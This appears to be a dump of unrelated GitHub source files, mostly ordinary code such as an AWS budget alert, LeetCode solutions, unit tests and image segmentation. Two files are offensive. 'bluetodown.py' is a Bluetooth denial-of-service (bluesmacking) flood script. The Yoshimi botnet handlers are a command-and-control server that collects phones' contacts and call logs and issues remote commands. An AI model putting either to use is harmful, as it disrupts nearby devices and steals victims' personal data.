\"\"\" A Reflex Rule for detecting the modification or deletion of AWS Budgets \"\"\"\n\n def __init__(self, event):\n super().__init__(event)\n\n def extract_event_data(self, event):\n \"\"\" Extract required event data \"\"\"\n self.event_name = event[\"detail\"][\"eventName\"]\n\n if self.event_name == \"UpdateBudget\":\n self.event_type = \"updated\"\n self.budget_name = event[\"detail\"][\"requestParameters\"][\"newBudget\"][\n \"budgetName\"\n ]\n else: # self.event_name == \"DeleteBudget\"\n self.event_type = \"deleted\"\n self.budget_name = event[\"detail\"][\"requestParameters\"][\"budgetName\"]\n\n def resource_compliant(self):\n \"\"\"\n Determine if the resource is compliant with your rule.\n\n Return True if it is compliant, and False if it is not.\n \"\"\"\n # We simply want to know when this event occurs. Since this rule was\n # triggered we know that happened, and we want to alert. Therefore\n # the resource is never compliant.\n return False\n\n def get_remediation_message(self):\n \"\"\" Returns a message about the remediation action that occurred \"\"\"\n return f\"The AWS Budget {self.budget_name} was {self.event_type}.\"\n\n\ndef lambda_handler(event, _):\n \"\"\" Handles the incoming event \"\"\"\n print(event)\n event_payload = json.loads(event[\"Records\"][0][\"body\"])\n if subscription_confirmation.is_subscription_confirmation(event_payload):\n subscription_confirmation.confirm_subscription(event_payload)\n return\n rule = BudgetModifiedOrDeleted(event_payload)\n rule.run_compliance_rule()\n","repo_name":"reflexivesecurity/reflex-aws-budget-modified-or-deleted","sub_path":"source/reflex_aws_budget_modified_or_deleted.py","file_name":"reflex_aws_budget_modified_or_deleted.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74222665768","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def deepestLeavesSum(self, root: Optional[TreeNode]) -> int:\n if not root:\n return 0\n maxd=0\n sums=0\n \n def dfs(node,dep):\n nonlocal maxd\n nonlocal sums\n if dep>maxd:\n maxd=dep\n sums=node.val\n elif dep==maxd:\n sums+=node.val\n if node.left:\n dfs(node.left,dep+1)\n if node.right:\n dfs(node.right,dep+1)\n dfs(root,1)\n return sums","repo_name":"abhi-apple/leetcode","sub_path":"1302-deepest-leaves-sum/1302-deepest-leaves-sum.py","file_name":"1302-deepest-leaves-sum.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"28194238331","text":"def read_file_data(path):\n result = []\n with open(path, 'r', encoding='utf8') as datafile:\n for line in datafile:\n result.append(line.strip('\\n').split(','))\n return result\n\n\ndef save_data_to_file(path, data_list):\n with open(path, 'w', encoding='utf8') as datafile:\n for rawdata in data_list:\n datafile.write(','.join(rawdata)+'\\n')\n\n\ndef show_commands(commands):\n for item in commands:\n print(f'{item[0]} - {item[1]}')\n\n\ndef show_route_detail(routes, drivers, buses):\n temp_list = []\n for i in range(0, len(routes)):\n temp_list.append(routes[i].copy())\n for driver in drivers:\n if routes[i][3] == driver[0]:\n temp_list[i][3] = driver[1]\n for bus in buses:\n if routes[i][2] == bus[0]:\n temp_list[i][2] = bus[1]\n show_route(temp_list[i])\n\n\ndef show_driver(record):\n print(\n f'id: {record[0]} | Driver: {record[1].title()} {record[2].title()} | Year of birth: {record[3]} \\n ')\n\n\ndef show_route(record):\n print(\n f'id: {record[0]} | Number: {record[1]} | Driver: {record[3].title()} | Bus: {record[2].upper()}\\n ')\n\n\ndef show_bus(record):\n print(\n f'id: {record[0]} | Registration number: {record[1].upper()}\\n ')\n\n\ndef show_drivers_list(drivers):\n for el in drivers:\n show_driver(el)\n\n\ndef show_buses_list(buses):\n for el in buses:\n show_bus(el)\n\n\ndef add_driver(path, drivers):\n id = input('Enter id: ').lower()\n surname = input('Enter surname: ').lower()\n name = input('Enter name: ').lower()\n birth = input('Enter year of birth: ')\n result_record = [id, surname, name, birth]\n drivers.append(result_record)\n save_data_to_file(path, drivers)\n\n\ndef add_bus(path, buses):\n id = input('Enter id: ').lower()\n number = input('Enter registration number: ').lower()\n result_record = [id, number]\n buses.append(result_record)\n save_data_to_file(path, buses)\n\n\ndef add_route(path, routes):\n id = input('Enter id: ').lower()\n number = input('Enter number: ').lower()\n bus_id = input('Enter bus id: ').lower()\n driver_id = input('Enter driver id: ').lower()\n result_record = [id, number, bus_id, driver_id]\n routes.append(result_record)\n save_data_to_file(path, routes)\n\n\ndef delete_record(path, records_list):\n id = input('Enter id of the record: ')\n for record in records_list:\n if record[0] == id:\n records_list.remove(record)\n save_data_to_file(path, records_list)\n","repo_name":"NeaMarySm/python","sub_path":"helloWorld/practice7/buses/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25704331288","text":"\"\"\"Test BaseMerimee.py.\"\"\"\n\nimport unittest\nimport os.path\nfrom BaseMerimee import BaseMerimee, handle_Merimee_csv_row, parse_Merimee_csv\n\n\nclass TestBaseMerimee(unittest.TestCase):\n\n \"\"\"Base class for testing BaseMerimee related methods.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.csv_file = os.path.join(os.path.dirname(__file__),\n 'data', 'merimee-MH-10.csv')\n\n cls.merimee_row = {'ADRS': u'Dans le cimeti\\xe8re',\n 'LOCA': u'Champagne-Ardenne ; Aube ; Aix-en-Othe',\n 'SCLE': u'15e si\\xe8cle ; 16e si\\xe8cle',\n 'COM': u'Aix-en-Othe',\n 'ETUD': u'Recensement immeubles MH',\n 'STAT': u'Propri\\xe9t\\xe9 de la commune',\n 'PPRO': u'Chapelle Saint-Avit (cad. AC 4) : inscription par arr\\xeat\\xe9 du 28 janvier 1975',\n 'DPT': u'10',\n 'INSEE': u'10003',\n 'AUTR': u'',\n 'AFFE': u'',\n 'REF': u'PA00078014',\n 'REG': u'Champagne-Ardenne',\n 'TICO': u'Chapelle Saint-Avit'}\n cls.merimee_row_enriched = cls.merimee_row.copy()\n cls.merimee_row_enriched['MH_TYPE'] = 'inscrit'\n\n def test_handle_Merimee_csv_row(self):\n \"\"\"Test handle_Merimee_csv_row().\"\"\"\n result = handle_Merimee_csv_row(self.merimee_row)\n self.assertEqual(result, self.merimee_row_enriched)\n\n def test_parse_Merimee_csv(self):\n result = parse_Merimee_csv(self.csv_file)\n self.assertEqual(result['PA00078014'], self.merimee_row_enriched)\n","repo_name":"JeanFred/MerimeeMaintenace","sub_path":"test/test_BaseMerimee.py","file_name":"test_BaseMerimee.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38789126090","text":"import time\nimport torch\nimport numpy as np\nimport sys\n\n \n\ndef meshgrid(x, y, row_major=True):\n xx = x.repeat(len(y))\n yy = y.view(-1, 1).repeat(1, len(x)).view(-1)\n if row_major:\n return xx, yy\n else:\n return yy, xx\n\ndef valid_flags(featmap_size, valid_size, num_base_anchors, device='cuda'):\n feat_h, feat_w = featmap_size\n valid_h, valid_w = valid_size\n assert valid_h <= feat_h and valid_w <= feat_w\n valid_x = torch.zeros(feat_w, dtype=torch.uint8, device=device)\n valid_y = torch.zeros(feat_h, dtype=torch.uint8, device=device)\n valid_x[:valid_w] = 1\n valid_y[:valid_h] = 1\n valid_xx, valid_yy = meshgrid(valid_x, valid_y)\n valid = valid_xx & valid_yy\n valid = valid[:, None].expand(\n valid.size(0), num_base_anchors).contiguous().view(-1)\n return valid\n\n@torch.jit.script\ndef fast_valid(featmap_size: tuple, valid_size: tuple, num_base_anchors: int, device='cuda'):\n feat_h, feat_w = featmap_size\n valid_h, valid_w = valid_size\n assert valid_h <= feat_h and valid_w <= feat_w\n valid_x = torch.zeros(feat_w, dtype=torch.uint8, device=device)\n valid_y = torch.zeros(feat_h, dtype=torch.uint8, device=device)\n valid_x[:valid_w] = 1\n valid_y[:valid_h] = 1\n valid_xx, valid_yy = meshgrid(valid_x, valid_y)\n valid = valid_xx & valid_yy\n valid = valid[:, None].expand(\n valid.size(0), num_base_anchors).contiguous().view(-1)\n return valid\n\nif __name__ == \"__main__\":\n\n # M, N denotes the featmap size\n # K means the number of base anchors\n if(len(sys.argv) == 4):\n M = int(sys.argv[1])\n N = int(sys.argv[2])\n K = int(sys.argv[3])\n\n else:\n M = 160\n N = 120\n K = 3\n \n featmap_size = (M, N)\n valid_size = (M, N)\n num_base_anchors = K\n\n sfunc = valid_flags\n sargs_list = [featmap_size, valid_size, num_base_anchors]\n assert torch.allclose(\n valid_flags(*sargs_list), fast_valid(*sargs_list), equal_nan=True)\n\n # performance check\n torch.cuda.synchronize()\n time_before = time.time()\n\n for _ in range(10000):\n ret = valid_flags(*sargs_list)\n\n torch.cuda.synchronize()\n time_mid = time.time()\n\n for _ in range(10000):\n ret = fast_valid(*sargs_list)\n\n torch.cuda.synchronize()\n time_end = time.time()\n print(\"time costing torch: \" + str(time_mid - time_before))\n print(\"time costing torchscript: \" + str(time_end - time_mid))\n","repo_name":"leleucas/compiler-paper","sub_path":"cases/pytorch/valid_flags.py","file_name":"valid_flags.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32335232462","text":"points = [10, 8, 6, 5, 4, 3, 2, 1, 0]\r\ntimes = sorted([list(input().split()) for _ in range(8)])\r\nb, r = 0, 0\r\n\r\nfor i in range(8):\r\n if times[i][1] == 'B':\r\n b += points[i]\r\n else:\r\n r += points[i]\r\nprint(\"Red\" if r > b else \"Blue\")","repo_name":"KHyeon9/Algorithm_Python","sub_path":"BOJ/Bronze/27522.py","file_name":"27522.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36606815211","text":"\n\"\"\"\nunitooth - main program entry\n\"\"\"\n\n# built-in\nimport sys\nimport argparse\n\n# package\nfrom . import connect\nfrom . import find\nfrom . import listen\n\ndef main():\n \"\"\" unitooth entry \"\"\"\n\n # Initialize argparse\n parser = argparse.ArgumentParser(\n description=\"A PyBluez wrapper for Unity applications\",\n epilog=\"Developed by University of Wisconsin-Madison Undergraduates\",\n prog=\"ut\"\n )\n\n # Add capability for subparsers\n subparser = parser.add_subparsers()\n\n # Add sub-commands\n find.init_args(subparser)\n listen.init_args(subparser)\n connect.init_args(subparser)\n\n # Prevent stack-trace dump if no arguments are given\n if len(sys.argv) == 1:\n sys.argv.append(\"\")\n\n # Parse arguments and then run the chosen command\n args = parser.parse_args(sys.argv[1:])\n return args.handler(args)\n","repo_name":"sjfricke/UniTooth","sub_path":"src/Python/unitooth/entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"74056988648","text":"#coding:utf-8\nimport os \nimport shutil\nimport glob\ndestdir=r'J:\\med'\nsrcdir='J:\\迅雷下载'\ntype_list=['rmvb','avi','mp4','wmv']\nprint('desdir: '+destdir)\nprint('srcdir: '+srcdir)\n\n'''return a list containing all the files in file_dir'''\ndef all_file(file_dir):\n file_list=[]\n name_list=os.listdir(file_dir)\n for each_f in name_list:\n if os.path.isfile(os.path.join(file_dir,each_f)):\n file_list.append(os.path.join(file_dir,each_f))\n elif os.path.isdir(os.path.join(file_dir,each_f)):\n newdir=os.path.join(file_dir,each_f)\n file_list.extend(all_file(newdir))\n return file_list \n\n\n'return all the dir in file_dir'\ndef all_dir(file_dir):\n dir_list=[]\n name_list=os.listdir(file_dir)\n for each_f in name_list:\n if os.path.isfile(os.path.join(file_dir,each_f)):\n pass\n elif os.path.isdir(os.path.join(file_dir,each_f)):\n newdir=os.path.join(file_dir,each_f)\n dir_list.append(newdir)\n dir_list.extend(all_dir(newdir))\n return dir_list \n \n'''return a list containing all the files of some certain types'''\ndef select_type(file_list,type_list):\n selected_list=[]\n for each_file in file_list:\n if each_file.split('.')[-1] in type_list:\n selected_list.append(each_file)\n return selected_list\n\ndef print_list(a_list):\n for each_l in a_list:\n print(each_l)\n\n\nselected_list=select_type(all_file(srcdir),type_list)\nprint_list(selected_list)\nflag=0\n\nfor each_file in selected_list:\n print('start moving file: '+each_file)\n print(flag)\n if 0==flag:\n print('sure to move '+each_file+'to '+destdir+' ?(y/n/a)')\n move=input()\n else :\n move=r'y'\n print(move)\n if 'y' in move or 'Y' in move:\n print('moving '+each_file)\n shutil.copy(each_file,destdir)\n print(each_file+' moved')\n elif 'a' or 'A' in move:\n flag=1\n print('moving '+each_file)\n shutil.copy(each_file,destdir)\n print(each_file+' moved') \n else:\n selected_list.remove(each_file)\nfor each_file in selected_list:\n os.remove(each_file)\n print(each_file+'removed')\nprint('remove complete')\n\n\nall_dirs=all_dir(srcdir)\ntargetdir=[]\nfor each_dir in all_dirs:\n if 'Thz.la' in each_dir:\n targetdir.append(each_dir)\n else:\n print(each_dir+' remained')\n pass\nprint('')\nprint(targetdir)\nfor each_dir in targetdir:\n shutil.rmtree(each_dir)\n print(each_dir+' removed')\n\n\n\n\n\n\n\n\n\n\n \n \n","repo_name":"chengxuanxie/file_collecting","sub_path":"file_moving.py","file_name":"file_moving.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26076463202","text":"#! /usr/bin/env python3.7\n\nfrom os import environ\nfrom sys import path\n\npath.append(environ['HOME'] + '/Workspace/Sys/pycharm_projs/galg/')\n\nfrom array import array\nfrom arrays.minimum_bribes import quick_minimum_bribes\n\n\ndef main():\n with open(\"test_minimum_bribes_001.txt\", 'r') as f:\n arr = [int(x) for x in f.read().rstrip().split(', ')]\n\n print(\"Debug Test 002\\n\" + \"-\" * 30)\n print(\"Input array: {}\".format(arr))\n quick_minimum_bribes(arr)\n\n arr = array('i', [2, 3, 1, 4, 5, 7, 8, 6, 9, 11, 10]) # expect 5\n\n print(\"Debug Test 002\\n\" + \"-\" * 30)\n print(\"Input array: {}\".format(arr))\n quick_minimum_bribes(arr)\n\n arr = array('i', [5, 1, 2, 3, 7, 8, 6, 4]) # Too chaotic\n\n print(\"Debug Test 002\\n\" + \"-\" * 30)\n print(\"Input array: {}\".format(arr))\n quick_minimum_bribes(arr)\n\n arr = array('i', [1, 2, 5, 3, 7, 8, 6, 4]) # except 7\n\n print(\"Debug Test 003\\n\" + \"-\" * 30)\n print(\"Input array: {}\".format(arr))\n quick_minimum_bribes(arr)\n\n arr = array('i', [2, 1, 5, 3, 4]) # expect 3\n\n print(\"Debug Test 001\\n\" + \"-\" * 30)\n print(\"Input array: {}\".format(arr))\n quick_minimum_bribes(arr)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gonzo-soc/galg","sub_path":"arrays/tests/minimum_bribes_tests.py","file_name":"minimum_bribes_tests.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75328597288","text":"import numpy as np\nfrom scipy import sparse as ss\n\nimport torch\nfrom torch.utils.data import TensorDataset\nfrom knodle.trainer.snorkel.utils import (\n z_t_matrix_to_snorkel_matrix,\n prepare_empty_rule_matches,\n add_labels_for_empty_examples\n)\n\n\ndef test_z_t_matrix_to_snorkel_matrix():\n # test dense case\n z = np.array([\n [0, 1, 0, 0],\n [0, 0, 1, 1]\n ])\n\n t = np.array([\n [1, 0],\n [0, 1],\n [1, 0],\n [0, 1]\n ])\n\n snorkel_gold = np.array([\n [-1, 1, -1, -1],\n [-1, -1, 0, 1]\n ])\n\n snorkel_test = z_t_matrix_to_snorkel_matrix(z, t)\n np.testing.assert_equal(snorkel_gold, snorkel_test)\n\n # test sparse case\n z = ss.csr_matrix([\n [0, 1, 0, 0],\n [0, 0, 1, 1]\n ])\n\n t = ss.csr_matrix([\n [1, 0],\n [0, 1],\n [1, 0],\n [0, 1]\n ])\n\n snorkel_gold = np.array([\n [-1, 1, -1, -1],\n [-1, -1, 0, 1]\n ])\n\n snorkel_test = z_t_matrix_to_snorkel_matrix(z, t)\n np.testing.assert_equal(snorkel_gold, snorkel_test)\n\n\ndef test_label_model_data():\n num_samples = 5\n num_rules = 6\n\n rule_matches_z = np.ones((num_samples, num_rules))\n rule_matches_z[[1, 4]] = 0\n\n non_zero_mask, out_rule_matches_z = prepare_empty_rule_matches(rule_matches_z)\n\n expected_mask = np.array([True, False, True, True, False])\n expected_rule_matches = np.ones((3, num_rules))\n\n np.testing.assert_equal(non_zero_mask, expected_mask)\n np.testing.assert_equal(out_rule_matches_z, expected_rule_matches)\n\n\ndef test_other_class_labels():\n label_probs_gen = np.array([\n [0.3, 0.6, 0.0, 0.1],\n [0.2, 0.2, 0.2, 0.4],\n [1.0, 0.0, 0.0, 0.0]\n ])\n output_classes = 5\n other_class_id = 4\n\n # test without empty rows\n non_zero_mask = np.array([True, True, True])\n expected_probs = np.array([\n [0.3, 0.6, 0.0, 0.1, 0.0],\n [0.2, 0.2, 0.2, 0.4, 0.0],\n [1.0, 0.0, 0.0, 0.0, 0.0]\n ])\n label_probs = add_labels_for_empty_examples(label_probs_gen, non_zero_mask, output_classes, other_class_id)\n\n np.testing.assert_equal(label_probs, expected_probs)\n\n # test with empty rows\n non_zero_mask = np.array([True, False, False, True, True])\n expected_probs = np.array([\n [0.3, 0.6, 0.0, 0.1, 0.0],\n [0.0, 0.0, 0.0, 0.0, 1.0],\n [0.0, 0.0, 0.0, 0.0, 1.0],\n [0.2, 0.2, 0.2, 0.4, 0.0],\n [1.0, 0.0, 0.0, 0.0, 0.0]\n ])\n label_probs = add_labels_for_empty_examples(label_probs_gen, non_zero_mask, output_classes, other_class_id)\n\n np.testing.assert_equal(label_probs, expected_probs)\n","repo_name":"knodle/knodle","sub_path":"tests/trainer/snorkel/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"53"} +{"seq_id":"9289192713","text":"\nclass ConversionNotPossible(Exception):\n pass\n\ndef convert(fromUnit, toUnit, value):\n\n temperature_conversions = {\n (\"Celsius\", \"Kelvin\"): lambda c: c + 273.15,\n (\"Celsius\", \"Fahrenheit\"): lambda c: (c * 9/5) + 32,\n (\"Kelvin\", \"Celsius\"): lambda k: k - 273.15,\n (\"Kelvin\", \"Fahrenheit\"): lambda k: (k - 273.15) * 9/5 + 32,\n (\"Fahrenheit\", \"Celsius\"): lambda f: (f - 32) * 5/9,\n (\"Fahrenheit\", \"Kelvin\"): lambda f: (f - 32) * 5/9 + 273.15,\n (\"Fahrenheit\", \"Fahrenheit\"): lambda f: f,\n (\"Kelvin\", \"Kelvin\"): lambda f: f,\n (\"Celsius\", \"Celsius\"): lambda f: f\n }\n \n distance_conversions = {\n (\"Miles\", \"Yards\"): lambda m: m * 1760,\n (\"Miles\", \"Meters\"): lambda m: m * 1609.34,\n (\"Yards\", \"Miles\"): lambda y: y / 1760,\n (\"Yards\", \"Meters\"): lambda y: y * 0.9144,\n (\"Meters\", \"Miles\"): lambda m: m / 1609.34,\n (\"Meters\", \"Yards\"): lambda m: m / 0.9144,\n (\"Meters\", \"Meters\"): lambda m: m, \n (\"Yards\", \"Yards\"): lambda m: m,\n (\"Miles\", \"Miles\"): lambda m: m \n }\n\n all_conversions = {**temperature_conversions, **distance_conversions}\n conversion_func = all_conversions.get((fromUnit, toUnit))\n if conversion_func:\n return conversion_func(value)\n else:\n raise ConversionNotPossible(f\"Conversion from {fromUnit} to {toUnit} is not possible.\")\n","repo_name":"elepore/IS211_Elizabeth_Lepore","sub_path":"IS211_Assignment6/conversions_refactored.py","file_name":"conversions_refactored.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7296416567","text":"# Author: @codigo_n3gro | https://linkedin.com/in/swagneycod3\n# Ano: 03/02/2021\n\n\nimport os\nimport sys\nimport time\nimport threading\n\ndef DOS(target_addr, packages_size):\n os.system('l2ping -i hci0 -s ' + str(packages_size) +' -f ' + target_addr)\n\ndef banner():\n print(''' \n BLUESMACKING ATTACK\n\n bluetodown.py target packt\n ''')\n \ndef main():\n banner()\n time.sleep(0.1)\n print('keep attention')\n if (input(\"Do you agree? (y/n) > \") in ['y', 'Y']):\n time.sleep(0.1)\n os.system('clear')\n banner()\n print('')\n\n target_addr = sys.argv[1]\n\n if len(target_addr) < 1:\n print('[!] ERROR: Target addr is missing')\n exit(0)\n\n try:\n packages_size = sys.argv[2]\n except:\n print('[!] ERROR: Packages size must be an integer')\n exit(0)\n try:\n threads_count = sys.argv[3]\n except:\n print('[!] ERROR: Threads count must be an integer')\n exit(0)\n print('')\n os.system('clear')\n\n print(\"\\x1b[31m[*] Wait just 3 seconds my Invader\")\n\n for i in range(0, 3):\n print('[*] ' + str(3 - i))\n time.sleep(1)\n \n print('[*] Building threads...\\n')\n\n for i in range(0, threads_count):\n print('[*] Built thread №' + str(i + 1))\n threading.Thread(target=DOS, args=[str(target_addr), str(packages_size)]).start()\n\n print('[*] Built all threads...')\n print('[*] STARTING...')\n else:\n print('RSRSRSRSRSRSRSRSRSRRSRSRS')\n exit(0)\n\nif __name__ == '__main__':\n try:\n os.system('clear')\n main()\n except KeyboardInterrupt:\n time.sleep(0.1)\n print('\\n[*] Aborted')\n exit(0)\n except Exception as e:\n time.sleep(0.1)\n print('[!] ERROR: ' + str(e)) \n","repo_name":"SwagneyCod3/RED-TEAM-SCRIPTS","sub_path":"bluetodown.py","file_name":"bluetodown.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"27979226629","text":"import json\nimport logging\n\nfrom models import PhoneBot, CallInfo, Contact, RemoteCommand\nfrom datetime import datetime\nfrom handlers.BaseHandlers import BotBaseHandler\nfrom tornado.web import RequestHandler\nfrom libs.SecurityDecorators import bots\n\nclass BotHelloHandler(BotBaseHandler):\n\n @bots\n def get(self, *args, **kwargs):\n ''' Bots come here and say hello '''\n bot = PhoneBot.by_uuid(self.request.headers['Uuid'])\n if bot == None:\n bot = PhoneBot(uuid = self.request.headers['Uuid'].encode('utf-8', 'ignore'))\n self.dbsession.add(bot)\n self.dbsession.flush()\n self.write(\"Welcome to the horde\")\n else:\n self.write(\"Pink evil robots\")\n self.finish()\n\nclass BotVersionHandler(BotBaseHandler):\n\n @bots\n def post(self, *args, **kwargs):\n ''' Collects version information '''\n try:\n # Prbly need to refactor this but it's more of a PoC\n self.bot.os_version = self.get_argument(\"os_version\").encode('utf-8', 'ignore')\n self.bot.build_version = self.get_argument(\"build_version\").encode('utf-8', 'ignore')\n self.bot.sdk_version = self.get_argument(\"sdk_version\").encode('utf-8', 'ignore')\n self.bot.release_version = self.get_argument(\"release_version\").encode('utf-8', 'ignore')\n self.bot.codename = self.get_argument(\"codename\").encode('utf-8', 'ignore')\n self.bot.device = self.get_argument(\"device\").encode('utf-8', 'ignore')\n self.bot.model = self.get_argument(\"model\").encode('utf-8', 'ignore')\n self.bot.product = self.get_argument(\"product\").encode('utf-8', 'ignore')\n self.bot.phone_number = self.get_argument(\"phone_number\").encode('utf-8', 'ignore')\n except:\n self.write(\"error\")\n self.finish()\n return\n self.dbsession.add(self.bot)\n self.dbsession.flush()\n self.write(\"ok\")\n self.finish()\n\nclass BotCallsHandler(BotBaseHandler):\n\n @bots\n def post(self, *args, **kwargs):\n try:\n jsonCalls = self.get_argument(\"jsonCalls\")\n calls = json.loads(jsonCalls)\n for key in calls.keys():\n call = json.loads(calls[key])\n phone_call = CallInfo(\n phone_bot_id = self.bot.id,\n call_type = call['callType'],\n number_type = call['numberType'],\n phone_number = call['phoneNumber'],\n contact_name = call['contactName'],\n )\n self.dbsession.add(phone_call)\n self.dbsession.flush()\n except:\n self.write(\"error\")\n self.finish()\n return\n self.write(\"ok\")\n self.finish()\n\nclass BotContactsHandler(BotBaseHandler):\n\n @bots\n def post(self, *args, **kwargs):\n try:\n jsonContact = self.get_argument(\"jsonContact\")\n except:\n self.write(\"Error: Missing parameter\")\n self.finish()\n return\n new_contact = json.loads(jsonContact)\n if Contact.by_phone_number(new_contact['phoneNumber'].replace(\";\", \"\")) == None:\n contact = Contact(\n phone_bot_id = self.bot.id,\n name = new_contact['contactName'].replace(\";\", \"\").encode('utf-8', 'ignore'),\n email = new_contact['contactEmail'].replace(\";\", \"\").encode('utf-8', 'ignore'),\n phone_number = new_contact['phoneNumber'].replace(\";\", \"\").encode('utf-8', 'ignore'),\n )\n self.dbsession.add(contact)\n self.dbsession.flush()\n self.write(\"ok\")\n self.finish()\n\nclass BotSmsHandler(BotBaseHandler):\n\n @bots\n def post(self, *args, **kwargs):\n ''' Collects Sms information from bot '''\n pass\n\nclass BotPingHandler(BotBaseHandler):\n\n @bots\n def get(self, *args, **kwargs):\n ''' Updates the last_seen, sends commands if they exist '''\n self.bot.last_seen = datetime.now()\n if 0 < RemoteCommand.qsize(self.bot.id):\n remote_command = RemoteCommand.pop(self.bot.id)\n self.write(remote_command.command)\n else:\n self.write(\"nop\")\n self.dbsession.add(self.bot)\n self.dbsession.flush()\n self.finish()\n\nclass BotCompletedCommandHandler(BotBaseHandler):\n\n @bots\n def get(self, *arg, **kwargs):\n ''' Bot reports here when a remote command has been completed successfully '''\n if 0 < RemoteCommand.qsize(self.bot.id):\n remote_command = RemoteCommand.pop(self.bot.id)\n remote_command.completed = True\n self.dbsession.add(remote_command)\n self.dbsession.flush()\n self.write('ok')\n self.finish()\n","repo_name":"moloch--/Yoshimi-Botnet","sub_path":"YoshimiControl/handlers/BotHandlers.py","file_name":"BotHandlers.py","file_ext":"py","file_size_in_byte":4856,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"53"} +{"seq_id":"15777585754","text":"from collections import Counter\n\n\nRU_LETTERS = set(\"абвгдеёжзиклмнопрстуфхцчшщьыъэюя\")\n\n\ndef slide_filtered(s, fn, w):\n for start in range(len(s) - w + 1):\n window = s[start:start+w]\n if all(map(fn, window)):\n yield window\n\n\ndef frequencies(text, f, win_size):\n counts = Counter(slide_filtered(text, f, win_size))\n total = sum(counts.values())\n return list(map(lambda p: (p[0], p[1] / total), counts.most_common()))\n\n\nif __name__ == '__main__':\n import sys\n import time\n path = sys.argv[1]\n window_size = int(sys.argv[2])\n\n t = time.perf_counter()\n with open(path) as text:\n for el, freq in frequencies(text.read().lower(), lambda c: c in RU_LETTERS, window_size):\n print(\"{} - {:.6f}\".format(el, freq))\n print(\"Done in {:.3f} s\".format(time.perf_counter() - t))\n","repo_name":"modelflat/practice-again","sub_path":"python/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74923259689","text":"# from myslic import *\n# from otherslic import *\nimport time\nimport unittest\n# from myslic import *\nimport cv2\nimport math\nimport numpy as np\nfrom skimage import io, color\nfrom numpy.testing import assert_almost_equal\nimport copy\n# from slic_fcts import *\n\ndef get_triangle_coordinates(rows, cols, L, frame):\n col_nb = (int)((cols - 2 * frame - L / 2) / L)\n col_coord = np.linspace(frame, cols - frame - 1 - L / 2, col_nb)\n coordinates = []\n row_nb = (int)((rows - 2 * frame) / L)\n row_coord = np.linspace(frame, rows - frame - 1, row_nb)\n for i, r in enumerate(row_coord):\n for c in col_coord:\n if i % 2 == 0:\n coordinates.append((int(r), int(c + L / 2)))\n else:\n coordinates.append((int(r), int(c)))\n return coordinates\n\n\ndef get_grid_coordinates(rows, cols, L, frame):\n col_nb = (int)((cols - 2 * frame - L / 2) / L)\n col_coord = np.linspace(frame, cols - frame - 1, col_nb)\n coordinates = []\n row_nb = (int)((rows - 2 * frame) / L)\n row_coord = np.linspace(frame, rows - frame - 1, row_nb)\n for i, r in enumerate(row_coord):\n for c in col_coord:\n coordinates.append((int(r), int(c)))\n return coordinates\n\n\nclass Cluster(object):\n cluster_index = 0\n\n def __init__(self, h, w, l=0, a=0, b=0):\n self.update(h, w, l, a, b)\n self.pixels = []\n self.no = self.cluster_index\n Cluster.cluster_index += 1\n\n def update(self, h, w, l, a, b):\n self.h = h\n self.w = w\n self.l = l\n self.a = a\n self.b = b\n\n def __str__(self):\n return \"{},{}:{} {} {} \".format(self.h, self.w, self.l, self.a, self.b)\n\n def __repr__(self):\n return self.__str__()\n\n def clear(self):\n self.pixels = []\n\n\nclass TestSLIC(unittest.TestCase):\n K = 40\n M = 50\n data = io.imread('parrot0.jpg')\n data = color.rgb2lab(data)\n image_height = data.shape[0]\n image_width = data.shape[1]\n N = image_height * image_width\n S = int(math.sqrt(N / K))\n coord = get_grid_coordinates(image_height, image_width, S, 10)\n border = 2 * S\n clusters = []\n for c in coord:\n h_ = int(c[0])\n w_ = int(c[1])\n # Replace make clusters\n c = Cluster(h_, w_, data[h_][w_][0], data[h_][w_][1], data[h_][w_][2])\n clusters.append(c)\n data = cv2.copyMakeBorder(data, border, border, border, border, cv2.BORDER_CONSTANT)\n image_height = data.shape[0]\n image_width = data.shape[1]\n for c in clusters:\n c.update(c.h + border, c.w + border, c.l, c.a, c.b)\n\n label = {}\n dis = np.full((image_height, image_width), -1.0)\n dis[border:image_height - border, border:image_width - border] = np.inf\n D = np.full((image_height, image_width), -1.0)\n D[border:image_height - border, border:image_width - border] = np.inf\n LABEL = np.full((image_height, image_width), -1.0)\n clusters_temp = np.empty((clusters[0].cluster_index, 3))\n\n test_slices = 